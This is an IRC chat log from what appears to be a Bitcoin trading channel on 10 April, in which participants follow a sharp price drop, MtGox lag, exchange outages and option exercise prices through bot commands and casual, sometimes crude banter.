could have sent a bitcoin from the Sun to Mars (1.52 AU). Apr 10 18:51:01 is the mpex bot offline right now? Apr 10 18:51:27 thats a lot of lag Apr 10 18:51:46 everyone is selling btc Apr 10 18:52:04 shakin' out the new goobers Apr 10 18:52:05 sell, sell, sell !!! Apr 10 18:52:36 ThickAsThieves: how do you know what mpexbot is buying calls for? Apr 10 18:52:47 i'm going through coinbr, mind you Apr 10 18:53:50 bot is down - has been for a while Apr 10 18:54:14 ok, so no prices showon coinbr, makes sense Apr 10 18:54:36 i can still use the last prices I see on mpex.co for some price data... Apr 10 18:57:09 ;;goxlag Apr 10 18:57:13 MtGox lag is 1058.278714 seconds. During this time, light travels 2.12077869378 AU. You could have sent a bitcoin from the Sun to Mars (1.52 AU). Apr 10 18:57:27 aww it came down Apr 10 18:57:58 [HAVELOCK] [HIM] 1 @ 0.75000001 BTC [-] Apr 10 18:58:58 [HAVELOCK] [KCIM] 1 @ 1.09 BTC [-] Apr 10 18:59:15 wow. HIM is way way down Apr 10 18:59:21 60% of IPO now Apr 10 18:59:59 [HAVELOCK] [VTX] 7 @ 0.22 = 1.54 BTC [-] Apr 10 19:01:20 fick Apr 10 19:01:50 you own some HIM, bug? Apr 10 19:01:54 hell no Apr 10 19:02:00 me either Apr 10 19:02:04 231. Apr 10 19:02:08 i thought price was outrageous Apr 10 19:02:19 yeah Apr 10 19:02:26 i'm seeing differen prices on all services Apr 10 19:02:30 244 on bitcoinity Apr 10 19:02:35 238 on clarkmoody Apr 10 19:02:38 clark is holding up the best Apr 10 19:02:46 for me Apr 10 19:02:58 [HAVELOCK] [VTX] 13 @ 0.2 = 2.6 BTC [-] Apr 10 19:03:00 Lag: 14:54.290 Apr 10 19:03:03 big selloff Apr 10 19:03:12 saw it coming Apr 10 19:03:17 about 5000 coins Apr 10 19:03:21 230 bottom Apr 10 19:03:47 yeah same here Apr 10 19:03:54 fast cash was out of funds though Apr 10 19:04:11 suddenly it found some funds after the dip below 250 though Apr 10 19:04:13 heh heh Apr 10 19:04:27 I think he turns of sales when the market is in super rally toppy mode. Apr 10 19:04:41 you mean mpex bot? Apr 10 19:04:53 whats fast cash Apr 10 19:04:53 no fastcash4bitcoins Apr 10 19:04:58 oh Apr 10 19:05:21 I don't know if 230 is going to hold Apr 10 19:05:24 we could drop to 200 Apr 10 19:05:29 before a real bounce Apr 10 19:05:41 ;;bids 0 Apr 10 19:05:41 There are currently 31798929 bitcoins demanded at or over 0.0 USD, worth 11985801.1795 USD in total. | Data vintage: 67.0128 seconds Apr 10 19:05:45 we're gonna lose 230 Apr 10 19:05:51 still more cpoins for sale Apr 10 19:05:54 I think we need to be above 14M to go up Apr 10 19:05:58 [HAVELOCK] [SDICE] 5 @ 0.2426 = 1.213 BTC [+] Apr 10 19:06:03 or to support this price level Apr 10 19:06:03 gotta get some cash into the exchanges :) Apr 10 19:06:24 the lag is out of control right now too Apr 10 19:06:27 ;;goxlag Apr 10 19:06:28 MtGox lag is 1022.119422 seconds. During this time, light travels 2.04831587747 AU. You could have sent a bitcoin from the Sun to Mars (1.52 AU). Apr 10 19:06:39 yeah 1.5 AU's may be part of the reason Apr 10 19:06:58 [HAVELOCK] [KCIM] 2 @ 1.04000001 = 2.08 BTC [-] Apr 10 19:07:52 but also, still at 250 at bitfloor Apr 10 19:07:58 lag is from major selloff triggering reordering of soft bids Apr 10 19:07:59 [HAVELOCK] [KCIM] 1 @ 1.04 BTC [-] Apr 10 19:08:00 [HAVELOCK] [KCIM] 1 @ 1.018 BTC [-] Apr 10 19:08:00 [HAVELOCK] [KCIM] 3 @ 1.014 = 3.042 BTC [-] Apr 10 19:08:21 yeah...but not everyone follows this as closely Apr 10 19:08:28 one major selloff+lag = panic for some Apr 10 19:09:06 would be nice if ;;bids showed a data vintage Apr 10 19:09:58 [HAVELOCK] [KCIM] 2 @ 1.014 = 2.028 BTC [-] Apr 10 19:11:49 what is the official wat to test which price mpex options uses to excercise? Apr 10 19:11:52 way Apr 10 19:11:58 [HAVELOCK] [KCIM] 1 @ 1.01100003 BTC [-] Apr 10 19:11:59 [HAVELOCK] [KCIM] 1 @ 1.01100003 BTC [-] Apr 10 19:12:03 is it $avg? Apr 10 19:12:05 any place beside bitcoincharts to get trade histories - site timeouts. I'm trying to reconstuct 24 moving avg for last year... Apr 10 19:12:26 $avg Apr 10 19:12:28 ThickAsThieves: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 10 19:12:55 would be nice to hold above 227... Apr 10 19:12:58 [HAVELOCK] [KCIM] 1 @ 1 BTC [-] Apr 10 19:12:59 :0 Apr 10 19:13:02 :) Apr 10 19:13:10 its rising guys... Apr 10 19:13:18 almost back to 240 Apr 10 19:13:42 and rising past 251 on bitfloor (i think this may be record volume for bitfloor as well) Apr 10 19:13:58 [HAVELOCK] [VTX] 5 @ 0.21 = 1.05 BTC [+] Apr 10 19:13:59 [HAVELOCK] [VTX] 12 @ 0.2 = 2.4 BTC [-] Apr 10 19:14:06 ;;bc,24hprc Apr 10 19:14:11 227.18 Apr 10 19:14:30 pgp is that what bot uses? Apr 10 19:14:34 options bot Apr 10 19:14:58 yes Apr 10 19:15:11 $avg Apr 10 19:15:13 MJR_: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 10 19:15:23 think both are equal but wanted to test Apr 10 19:15:54 it's in the faq Apr 10 19:15:58 [HAVELOCK] [KCIM] 1 @ 0.99520001 BTC [-] Apr 10 19:16:27 ;;goxlag Apr 10 19:16:27 MtGox lag is 1189.968031 seconds. During this time, light travels 2.38468261058 AU. You could have sent a bitcoin from the Sun to Ceres (in the main asteroid belt) (2.77 AU). Apr 10 19:16:52 thx Apr 10 19:17:27 faq predates mpexbot... Apr 10 19:17:53 $avg Apr 10 19:17:57 deadweasel: 227.18 Apr 10 19:18:06 yep equal Apr 10 19:18:12 ;;bc,24hprc Apr 10 19:18:19 227.18 Apr 10 19:18:41 could be coincidence. i thought ;;bc was gox only? Apr 10 19:19:01 nah, mpex uses it, so it must be the cross exchange number Apr 10 19:19:19 since mpex doesn't go by gox for options (not only by gox, though it makes up most of the number) Apr 10 19:21:28 ;;goxlog Apr 10 19:21:28 Error: "goxlog" is not a valid command. Apr 10 19:21:41 ;;goxlag Apr 10 19:21:41 MtGox lag is 871.828642 seconds. During this time, light travels 1.74713483709 AU. You could have sent a bitcoin from the Sun to Mars (1.52 AU). Apr 10 19:25:15 bc is cross exchange Apr 10 19:25:26 gawd damnit Apr 10 19:25:28 230 Apr 10 19:25:51 coins for sale is still increasing... Apr 10 19:26:29 and bot is still down Apr 10 19:26:58 just going to step away from this... Apr 10 19:28:15 haha Apr 10 19:28:46 $avg Apr 10 19:28:58 ThickAsThieves: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 10 19:29:02 ;;bc,24hprc Apr 10 19:29:07 227.18 Apr 10 19:30:42 ;;ticker Apr 10 19:30:46 BTCUSD ticker | Best bid: 233.00000, Best ask: 234.99999, Bid-ask spread: 1.99999, Last trade: 234.99999, 24 hour volume: 93700.32878955, 24 hour low: 220.00000, 24 hour high: 266.00000, 24 hour vwap: 239.14213 Apr 10 19:31:21 [BTCTC] [BTC-BOND] 41 @ 0.00996 = 0.4084 BTC [-] Apr 10 19:31:24 [BTCTC] [BTC-BOND] 1000 @ 0.01001 = 10.01 BTC [+] Apr 10 19:33:51 ;;ticker Apr 10 19:33:52 BTCUSD ticker | Best bid: 229.88659, Best ask: 230.00000, Bid-ask spread: 0.11341, Last trade: 229.88659, 24 hour volume: 93920.89273959, 24 hour low: 220.00000, 24 hour high: 266.00000, 24 hour vwap: 239.14560 Apr 10 19:34:17 ;;seen smickles Apr 10 19:34:17 smickles was last seen in #bitcoin-assets 6 days, 0 hours, 51 minutes, and 47 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 10 19:34:23 ;;ticker Apr 10 19:34:24 BTCUSD ticker | Best bid: 231.00000, Best ask: 235.00000, Bid-ask spread: 4.00000, Last trade: 230.62587, 24 hour volume: 93920.89273959, 24 hour low: 220.00000, 24 hour high: 266.00000, 24 hour vwap: 239.14560 Apr 10 19:34:41 okay rally is back on Apr 10 19:34:56 Who bought those BTC-BOND... Apr 10 19:34:57 lol Apr 10 19:34:59 anyway... Apr 10 19:35:54 thestringpuller: where do you see that? I only see trades that were issued 10 minutes ago because gox is a piece of shit Apr 10 19:36:04 !ticker h vtx Apr 10 19:36:05 ;;goxlag Apr 10 19:36:06 [HAVELOCK:VTX] 1D: 0.18000000 / 0.22859646 / 0.28000000 (421 shares, 96.23910756 BTC), 7D: 0.18000000 / 0.31138451 / 0.47000000 (1490 shares, 463.96291803 BTC), 30D: 0.18000000 / 0.42180339 / 0.79900000 (14359 shares, 6056.67483856 BTC) Apr 10 19:36:12 MtGox lag is 586.074302 seconds. During this time, light travels 1.17448633919 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 10 19:36:15 ;;bids 120 Apr 10 19:36:17 There are currently 30682.543 bitcoins demanded at or over 120.0 USD, worth 5463681.92999 USD in total. | Data vintage: 4.2593 seconds Apr 10 19:36:30 ;;bids 220 Apr 10 19:36:31 There are currently 3087.9525 bitcoins demanded at or over 220.0 USD, worth 691260.620651 USD in total. | Data vintage: 19.8122 seconds Apr 10 19:36:44 wow. what is vtx and why did it crash? Apr 10 19:36:45 ;;asks 250 Apr 10 19:36:45 There are currently 3345.7072 bitcoins offered at or under 250.0 USD, worth 815592.437721 USD in total. | Data vintage: 34.7430 seconds Apr 10 19:36:52 lag blows!!! Apr 10 19:37:11 so goddamn frustrating... Apr 10 19:37:12 mod6 all havelock popped Apr 10 19:38:23 228 Apr 10 19:38:26 oh that vtx was the canadian exchange 'eh Apr 10 19:38:31 it 'popped'? Apr 10 19:39:07 yea Apr 10 19:39:16 ;;goxlag Apr 10 19:39:16 MtGox lag is 576.990166 seconds. During this time, light travels 1.15628183236 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 10 19:39:35 HIM is BFL based. Apr 10 19:39:39 hmm Apr 10 19:39:41 227 Apr 10 19:39:45 wow super gox lag Apr 10 19:39:56 ;;ticker Apr 10 19:39:57 BTCUSD ticker | Best bid: 229.11000, Best ask: 230.00000, Bid-ask spread: 0.89000, Last trade: 230.00000, 24 hour volume: 94682.35153073, 24 hour low: 220.00000, 24 hour high: 266.00000, 24 hour vwap: 239.10318 Apr 10 19:40:24 ;;ticker Apr 10 19:40:25 BTCUSD ticker | Best bid: 229.11000, Best ask: 230.00000, Bid-ask spread: 0.89000, Last trade: 230.00000, 24 hour volume: 95098.86292173, 24 hour low: 220.00000, 24 hour high: 266.00000, 24 hour vwap: 239.05336 Apr 10 19:40:30 ugh Apr 10 19:41:04 226 Apr 10 19:41:13 gonna go lower still Apr 10 19:41:17 yep Apr 10 19:41:38 where's the new money? Apr 10 19:41:39 finally the roller coaster goes down Apr 10 19:42:02 It will go to about 211-212 Apr 10 19:42:21 225 Apr 10 19:42:40 could go 190. could shoot up in the night to 300. who fuggin knows. Apr 10 19:43:06 Oh high of 266 I missed that somehow duh Apr 10 19:43:09 yeah 225 Apr 10 19:43:31 back to 300 tomorrow! Apr 10 19:43:35 haha Apr 10 19:43:42 anyhow off to do work. Apr 10 19:43:49 https://www.kraken.com/market Apr 10 19:43:59 good depth graphs Apr 10 19:50:25 ;;bc,24hprc Apr 10 19:50:26 Error: Failed to retrieve data. Try again later. Apr 10 19:50:36 $avg Apr 10 19:50:38 ThickAsThieves: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 10 19:50:43 ;;bc,24hprc Apr 10 19:50:44 Error: Failed to retrieve data. Try again later. Apr 10 19:51:27 lol, forums down. :) newbs ddosing it to post panic posts Apr 10 19:51:38 good times Apr 10 19:51:54 forums up again! :) Apr 10 19:53:36 ;;market --sell 1000 Apr 10 19:53:39 A market order to sell 1000 bitcoins right now would net 220609.3737 USD and would take the last price down to 219.0000 USD, resulting in an average price of 220.6094 USD/BTC. | Data vintage: 0.0002 seconds Apr 10 19:55:39 arrrgg veggies! Apr 10 19:56:47 fuuuuk Apr 10 19:57:00 ;;ticker Apr 10 19:57:03 BTCUSD ticker | Best bid: 218.50000, Best ask: 226.99999, Bid-ask spread: 8.49999, Last trade: 218.50000, 24 hour volume: 95443.23142610, 24 hour low: 218.50000, 24 hour high: 266.00000, 24 hour vwap: 238.94761 Apr 10 19:57:15 yeah, we under 219 now Apr 10 19:59:05 endoftheworld.swf Apr 10 19:59:18 woohoo Apr 10 19:59:19 ;;bc,24hprc Apr 10 19:59:19 Error: Failed to retrieve data. Try again later. Apr 10 19:59:25 we're stabilizing Apr 10 19:59:45 you call this stabilizing? Apr 10 20:00:09 I call this an arbitrary retarded rollercoaster Apr 10 20:00:13 ^ Apr 10 20:00:54 i'm predicting stabilization Apr 10 20:01:04 not calling a 45+ drop stabilization Apr 10 20:02:23 callin' the bottom? Apr 10 20:02:44 Just exercised a shitload of calls Apr 10 20:02:49 ARGH Apr 10 20:02:58 215 Apr 10 20:03:20 ;;ticker Apr 10 20:03:21 BTCUSD ticker | Best bid: 215.12452, Best ask: 220.00000, Bid-ask spread: 4.87548, Last trade: 215.12452, 24 hour volume: 96147.37374937, 24 hour low: 217.11100, 24 hour high: 266.00000, 24 hour vwap: 238.79527 Apr 10 20:03:55 Bugpowdurr: why? Apr 10 20:04:10 think dwonturn will push $avg down through to the 27th? Apr 10 20:04:11 cause 24hprc is 29 Apr 10 20:04:17 or 227 Apr 10 20:04:24 I dunno Apr 10 20:04:28 I am probably stupid Apr 10 20:04:49 227, no, i don't think you are. i've been preventing myself from clicking exercise all morning. Apr 10 20:04:50 I'm up a lot on these calls, want to protect the profits Apr 10 20:04:58 smart. Apr 10 20:05:05 I still have 1000 C302Ts... Apr 10 20:05:06 i think so... Apr 10 20:05:12 its going back up? Apr 10 20:05:14 Anyone want to buy some C302Ts???? Apr 10 20:05:33 90% chance it bounces hard by 200. Apr 10 20:06:26 105% chance it goes past 200 Apr 10 20:07:15 [BTCTC] [GOLD] 2 @ 0.06746 = 0.1349 BTC [-] Apr 10 20:07:51 if it breaks $200, noob panic will set in... Apr 10 20:08:17 ;) Apr 10 20:08:19 cmon 200 Apr 10 20:08:21 215 going, going. gone... Apr 10 20:08:31 hows your cash looking guys? Apr 10 20:08:45 got some ready? Apr 10 20:09:24 [BTCTC] [GOLD] 3 @ 0.06746 = 0.2024 BTC [-] Apr 10 20:09:35 yeah when she bottoms be ready to BTFD Apr 10 20:10:13 [BTCTC] [GOLD] 1 @ 0.06746 BTC [-] Apr 10 20:11:25 ;;goxlag Apr 10 20:11:35 Error: Problem retrieving gox lag. Try again later. Apr 10 20:11:38 ;;goxlaglag Apr 10 20:11:38 Error: "goxlaglag" is not a valid command. Apr 10 20:11:57 pgp http://jezus.si/graf/dashboards/bitcoin/details/lag/ Apr 10 20:12:06 lag on lag... Apr 10 20:12:48 you know you have failed at providing a service when people actually bother to graph your lag Apr 10 20:12:49 btce is at 175 already Apr 10 20:13:00 implying mtgox lag isnt fucking the price development up Apr 10 20:13:23 Scrat: +1 Apr 10 20:14:09 [BTCTC] [GOLD] 1 @ 0.06746 BTC [-] Apr 10 20:14:21 175? i don't see that? Apr 10 20:14:46 http://jezus.si:81/render/?title=Bitstamp+and+Mtgox+market+values+-+1+hour&vtitle=Dollars&from=-1hour&width=500&height=250&until=now&areaMode=none&lineMode=connected&target=alias%28bitcoin.mtgox.transactions%2C%22Mtgox%22%29&target=alias%28bitcoin.bitstamp.transactions%2C%22Bitstamp%22%29 Apr 10 20:14:47 https://btc-e.com Apr 10 20:14:49 Last Price: 181.996 USD Apr 10 20:14:51 pgp: gotta visit the website. bitcoinity is behind Apr 10 20:14:53 @ btc-e.com Apr 10 20:15:01 shit.... Apr 10 20:15:06 low is 168 Apr 10 20:15:33 lag is in the stratosphere Apr 10 20:15:57 is it 168? Apr 10 20:16:02 i see 213 Apr 10 20:16:17 it was Apr 10 20:16:20 MJR_ between 20 and 2000 Apr 10 20:16:24 shooting back up right now again Apr 10 20:16:28 thats my range Apr 10 20:16:35 just watch the decimal point is my strategy Apr 10 20:16:40 :) Apr 10 20:18:39 btw Apr 10 20:18:42 that lag chart Apr 10 20:18:46 20 minuts lag Apr 10 20:18:59 can we put mtgox to sleep now Apr 10 20:19:12 yes please Apr 10 20:19:33 put it in a bag and hold it under water. Apr 10 20:19:33 its painful to watch Apr 10 20:19:47 burn the entire deck of cards Apr 10 20:21:01 204 on coinlab Apr 10 20:21:05 thank god mpoebot is not on here Apr 10 20:21:13 otherwise I might buy puts Apr 10 20:21:18 like an idiot Apr 10 20:21:36 saving yourself from yourself? Apr 10 20:21:58 does anyone know the actual price my lags are over 20 mins Apr 10 20:22:14 there is no actual price Apr 10 20:22:19 watch it at btce Apr 10 20:22:23 best bet Apr 10 20:22:36 209 on gox, 24h low Apr 10 20:22:47 ;;ticker --last Apr 10 20:22:48 204.00000 Apr 10 20:32:26 ;;goxlag Apr 10 20:32:26 MtGox lag is 1936.838474 seconds. During this time, light travels 3.88140261597 AU. You could have sent a bitcoin from the Sun to Ceres (in the main asteroid belt) (2.77 AU). Apr 10 20:34:20 let's make it 6000 seconds... Apr 10 20:35:03 basically a 10 dollar spread right now Apr 10 20:35:05 hah, sittin in the asteroid belt Apr 10 20:35:58 which cannot be exploited anyway Apr 10 20:35:58 ;;ticker Apr 10 20:36:05 BTCUSD ticker | Best bid: 207.64769, Best ask: 210.00000, Bid-ask spread: 2.35231, Last trade: 200.20000, 24 hour volume: 94268.30080656, 24 hour low: 200.57000, 24 hour high: 266.00000, 24 hour vwap: 238.09025 Apr 10 20:36:13 old data Apr 10 20:36:15 printing 200 Apr 10 20:36:18 $avg Apr 10 20:36:23 taub: 227.18 Apr 10 20:36:58 [HAVELOCK] [VTX] 10 @ 0.26 = 2.6 BTC [+] Apr 10 20:36:59 [HAVELOCK] [VTX] 3 @ 0.2629 = 0.7887 BTC [+] Apr 10 20:37:01 avg hasn't changed at all... something is wrong tith that Apr 10 20:37:31 200 Apr 10 20:37:33 pgp Apr 10 20:37:35 I know Apr 10 20:37:36 ;;ticker Apr 10 20:37:40 BTCUSD ticker | Best bid: 200.00000, Best ask: 205.00000, Bid-ask spread: 5.00000, Last trade: 200.00000, 24 hour volume: 93585.85587562, 24 hour low: 200.20000, 24 hour high: 266.00000, 24 hour vwap: 238.10401 Apr 10 20:37:44 mpex bot is down too Apr 10 20:37:46 fick Apr 10 20:37:57 [HAVELOCK] [VTX] 10 @ 0.26 = 2.6 BTC [-] Apr 10 20:38:02 bitfloor just crashed i think Apr 10 20:38:05 puts would be nice to buy with a $27 mispricing Apr 10 20:38:06 lol Apr 10 20:38:37 no options available... Apr 10 20:38:50 bitfloor been down for a while, eh? Apr 10 20:38:58 [HAVELOCK] [VTX] 10 @ 0.2629 = 2.629 BTC [+] Apr 10 20:39:04 I think mircea takes the bot offline when these wild swings occur or something Apr 10 20:39:21 so people don't take advantage of the huge average/price difference Apr 10 20:39:25 778 print at 200 Apr 10 20:39:31 bouncing? Apr 10 20:39:42 i don't think so... wall is falling Apr 10 20:39:58 [HAVELOCK] [VTX] 5 @ 0.263 = 1.315 BTC [+] Apr 10 20:40:00 or bot just goes of when it can't get an average, which is from bitcoincharts which tends to go bust at the same time as MtGox Apr 10 20:40:34 [MPEX] [S.MPOE] 2273 @ 0.00069098 = 1.5706 BTC [-] Apr 10 20:40:41 well, maybe he only runs the bot when he at his terminal... he's not logged on here... Apr 10 20:40:42 if we break 200 Apr 10 20:40:44 oh my Apr 10 20:40:57 [HAVELOCK] [VTX] 4 @ 0.263988 = 1.056 BTC [+] Apr 10 20:41:32 ;;goxlag Apr 10 20:41:33 MtGox lag is 2198.736701 seconds. During this time, light travels 4.40624373052 AU. You could have sent a bitcoin from the Sun to Jupiter (5.2 AU). Apr 10 20:41:45 we've made it to jupiter! Apr 10 20:41:53 I'm waiting for Saturn Apr 10 20:41:55 laglag lag lag alaaaaaaaaaaag we all lag Apr 10 20:41:57 [HAVELOCK] [VTX] 4 @ 0.2687 = 1.0748 BTC [+] Apr 10 20:42:01 we hit Saturn before Apr 10 20:42:28 can't wait... saturn is a beautiful sight to behold... Apr 10 20:42:36 does he have pluto? Apr 10 20:42:38 ;;ticker Apr 10 20:42:40 BTCUSD ticker | Best bid: 200.00000, Best ask: 210.00000, Bid-ask spread: 10.00000, Last trade: 200.00000, 24 hour volume: 95453.02714893, 24 hour low: 200.00000, 24 hour high: 266.00000, 24 hour vwap: 237.25191 Apr 10 20:42:41 more big prints at 200 Apr 10 20:42:43 or is he a planetary purist Apr 10 20:42:52 another obvious dump and buy Apr 10 20:43:34 not so sure about that... Apr 10 20:43:36 seems like a possible strategy indeed Apr 10 20:43:44 I want my putttts Apr 10 20:43:58 [HAVELOCK] [VTX] 1 @ 0.2629 BTC [-] Apr 10 20:43:59 [HAVELOCK] [VTX] 1 @ 0.2688 BTC [+] Apr 10 20:44:01 [HAVELOCK] [VTX] 2 @ 0.268888 = 0.5378 BTC [+] Apr 10 20:44:01 [HAVELOCK] [VTX] 1 @ 0.289 BTC [+] Apr 10 20:44:02 [HAVELOCK] [VTX] 1 @ 0.299998 BTC [+] Apr 10 20:44:03 [HAVELOCK] [VTX] 50 @ 0.3 = 15 BTC [+] Apr 10 20:44:04 [HAVELOCK] [VTX] 44 @ 0.3 = 13.2 BTC [+] Apr 10 20:44:10 picking a bottom on a swift downdraft like this could be painful Apr 10 20:44:18 would you buy puts regardless of the lag at the time of purchase? Apr 10 20:44:32 [MPEX] [S.DICE] 500 @ 0.002779 = 1.3895 BTC [-] Apr 10 20:44:34 [MPEX] [S.DICE] 2400 @ 0.00277899 = 6.6696 BTC [-] Apr 10 20:44:42 [MPEX] [S.DICE] 2099 @ 0.0027 = 5.6673 BTC [-] Apr 10 20:44:44 $10 spread - for real? what a fucking joke! Apr 10 20:45:28 I always lose money buying puts Apr 10 20:45:34 but you never know! Apr 10 20:45:49 once you might win ! Apr 10 20:45:57 [HAVELOCK] [KCIM] 1 @ 1.12 BTC [+] Apr 10 20:46:02 ;;goxlag Apr 10 20:46:03 MtGox lag is 2414.772998 seconds. During this time, light travels 4.83917805085 AU. You could have sent a bitcoin from the Sun to Jupiter (5.2 AU). Apr 10 20:46:58 200 is gone Apr 10 20:47:02 hio Apr 10 20:47:07 fun times Apr 10 20:47:10 blood in the streets Apr 10 20:47:26 ;;calc 2414/60 Apr 10 20:47:26 40.2333333333 Apr 10 20:47:31 40 minutes lag will do that Apr 10 20:47:35 may someone give me a pointer to where i can find a satoshidice related channel? Apr 10 20:47:51 someone just made a lot of money Apr 10 20:47:55 i guess no one has declared self-help? Apr 10 20:47:55 feeling better about exercising? Apr 10 20:48:07 ;;bc,24hprc Apr 10 20:48:08 227.18 Apr 10 20:48:13 hmmm Apr 10 20:48:17 it wrong Apr 10 20:48:21 196 Apr 10 20:48:28 210 Apr 10 20:48:29 btce and virtex are showing 170 Apr 10 20:48:31 ;;calc (227.18-164)/227.18 Apr 10 20:48:31 0.278105467031 Apr 10 20:48:32 $14 spread... Apr 10 20:48:57 i think gox just died Apr 10 20:49:03 can I exercise now on coinbr? Apr 10 20:49:07 yes you can Apr 10 20:49:19 Lornzz: about investing or gambling? Apr 10 20:49:29 it will be based on the avg price? Apr 10 20:49:30 ;;goxlag Apr 10 20:49:32 MtGox lag is 2513.197929 seconds. During this time, light travels 5.03642051055 AU. You could have sent a bitcoin from the Sun to Jupiter (5.2 AU). Apr 10 20:49:37 just imagine if gox supported buy stop and sell stop orders... Apr 10 20:50:09 FabianB_: gambling related Apr 10 20:50:15 actually Apr 10 20:50:16 ^_^ Apr 10 20:50:17 support related Apr 10 20:50:28 ;;ticker Apr 10 20:50:28 dunno then, probably not Apr 10 20:50:29 BTCUSD ticker | Best bid: 194.10508, Best ask: 200.00000, Bid-ask spread: 5.89492, Last trade: 194.10508, 24 hour volume: 96446.18641015, 24 hour low: 194.10508, 24 hour high: 266.00000, 24 hour vwap: 236.68617 Apr 10 20:50:32 try the forums. Apr 10 20:50:40 ;;goxlag Apr 10 20:50:41 MtGox lag is 2521.606381 seconds. During this time, light travels 5.05327095421 AU. You could have sent a bitcoin from the Sun to Jupiter (5.2 AU). Apr 10 20:50:45 jesus Apr 10 20:50:54 which forums are you talking about? bitcoinstalk.org? Apr 10 20:50:58 mtgox ddos ? Apr 10 20:50:59 avg price is not working correctly... for sure Apr 10 20:51:26 it is Apr 10 20:51:39 i just exercised at the exact same as the bot said Apr 10 20:52:15 just did Apr 10 20:52:29 194 was the low Apr 10 20:53:53 ;;ticker Apr 10 20:53:53 BTCUSD ticker | Best bid: 193.15000, Best ask: 199.29345, Bid-ask spread: 6.14345, Last trade: 193.15000, 24 hour volume: 96446.18641015, 24 hour low: 194.10508, 24 hour high: 266.00000, 24 hour vwap: 236.68617 Apr 10 20:54:01 $avg Apr 10 20:54:05 pgp: 227.18 Apr 10 20:54:33 that number hasn't changed in over an hour Apr 10 20:54:42 it hasnt change for longer than that Apr 10 20:54:47 possibly all day Apr 10 20:54:49 prolly Apr 10 20:55:05 yeah, despite the bitcoincharts number updating Apr 10 20:55:16 Maybe MP ran off with all teh coinz Apr 10 20:55:29 [08:19] $avg Apr 10 20:55:29 [08:19] deadweasel: 227.18 Apr 10 20:55:41 drama has to come from somewhere Apr 10 20:55:47 game over man! Apr 10 20:55:55 can't get to bitcoincharts - what do it say? Apr 10 20:55:56 ok bounce at 150 now Apr 10 20:56:02 ddos Apr 10 20:56:14 its was 229.11 but sure that has dropped since then. Apr 10 20:57:12 bitcoinity down Apr 10 20:57:13 236 avg for gox alone Apr 10 20:57:33 bitcoinity down for me too... Apr 10 20:57:46 bitfloor still down too Apr 10 20:57:51 not good Apr 10 20:57:57 [HAVELOCK] [VTX] 8 @ 0.285 = 2.28 BTC [-] Apr 10 20:58:19 bitfloor got hacked again Apr 10 20:58:22 duuuug Apr 10 20:58:24 duch Apr 10 20:59:09 Bugpowdurr noway ?! Apr 10 20:59:28 190 on gox Apr 10 21:00:11 lawl Apr 10 21:00:17 where is dat putssss Apr 10 21:00:20 now relegated to hitting refresh on gox website.... Apr 10 21:00:31 fix your vwap brah Apr 10 21:01:01 exercising your calls is not enough? Apr 10 21:01:02 mpex using bad vwap Apr 10 21:01:14 pgp: you can join #bitcoin-market , amphipod seems to have a telepathic connection to exchanges Apr 10 21:02:01 any time max keiser opens his mouth things go to shit Apr 10 21:02:22 well, no bitcoincharts, no vwap. Apr 10 21:02:38 lol... max keiser for the win Apr 10 21:02:48 amen Apr 10 21:02:57 is the forum down too? Apr 10 21:03:02 lulz keiser Apr 10 21:03:06 god bless that man Apr 10 21:03:11 well, max & stacy were talking every day like buy buy buy Apr 10 21:03:25 i'd love to see a panel with mircea_popescu and max keiser together :P Apr 10 21:03:33 bitcoinity is back Apr 10 21:03:52 and these "journalists" on all the blogs and ZH, etc, nothing but just garbage reporting. Apr 10 21:04:10 i even liked ZH for a while, but this stuff lately has been outright retarded Apr 10 21:04:20 :< Apr 10 21:05:22 gesell he kinda got his ass handed to him last week so Apr 10 21:05:24 no one selling calls? Apr 10 21:05:26 i don't imagine he's gonna. Apr 10 21:05:50 wow low 183... Apr 10 21:05:57 [HAVELOCK] [VTX] 1 @ 0.2629 BTC [-] Apr 10 21:06:07 ;;ticker Apr 10 21:06:11 BTCUSD ticker | Best bid: 194.17125, Best ask: 198.00000, Bid-ask spread: 3.82875, Last trade: 183.00000, 24 hour volume: 97280.46863889, 24 hour low: 183.00000, 24 hour high: 266.00000, 24 hour vwap: 235.67905 Apr 10 21:06:25 mircea_popescu: where was that, i didnt see Apr 10 21:06:26 Mtgox is currently having some issue. Only orders routed to Bitfinex will be processed until Mtgox service has returned to normal. Apr 10 21:06:27 bitfloor is back Apr 10 21:06:38 and over 200 Apr 10 21:06:49 gesell on twitter. he was all herpderp bitcoin went to 150 as predicted now it is going to 500 Apr 10 21:06:52 this on the 3rd Apr 10 21:07:00 i was like stfu noob, get in line. Apr 10 21:07:08 where is juriv Apr 10 21:07:10 20 point spread on bfx Apr 10 21:07:10 then the trend broke and then he was all distraught Apr 10 21:07:11 jurov* Apr 10 21:07:53 you will see the flood of buy orders from 30 minutes ago start to come in now i think, we are trading with people in the past now Apr 10 21:08:10 this had to happen.. it's good Apr 10 21:08:18 hey, i agree Apr 10 21:08:23 ;;ticker Apr 10 21:08:24 BTCUSD ticker | Best bid: 183.00000, Best ask: 190.00000, Bid-ask spread: 7.00000, Last trade: 190.00000, 24 hour volume: 97280.46863889, 24 hour low: 183.00000, 24 hour high: 266.00000, 24 hour vwap: 235.67905 Apr 10 21:08:29 ;;goxlag Apr 10 21:08:30 MtGox lag is 3141.535095 seconds. During this time, light travels 6.295601156 AU. You could have sent a bitcoin from the Sun to Jupiter (5.2 AU). Apr 10 21:08:38 fuck you gox Apr 10 21:08:41 check bitstamp Apr 10 21:09:07 Scrat is right, get a good subset of exchange prices at #bitcoin-market Apr 10 21:09:32 yep - good call, scrat Apr 10 21:09:34 gox should lower the number of bids one can make based on current lag. that way small orders can drag things down, aand its analog'ish enough that as they fix lag issues even buts can do what they want Apr 10 21:09:48 s/can/cant Apr 10 21:10:24 btw, anyone have a contact to magicaltux? I would like to inform him of this 0day that would crash the websockets interface. Apr 10 21:10:46 PM on forum? Apr 10 21:10:47 isnt' that 0day like 3 months old? Apr 10 21:10:57 ;;ticker Apr 10 21:11:01 BTCUSD ticker | Best bid: 180.00000, Best ask: 198.00000, Bid-ask spread: 18.00000, Last trade: 180.00000, 24 hour volume: 97429.84097955, 24 hour low: 180.75700, 24 hour high: 266.00000, 24 hour vwap: 235.29545 Apr 10 21:11:02 yeah i 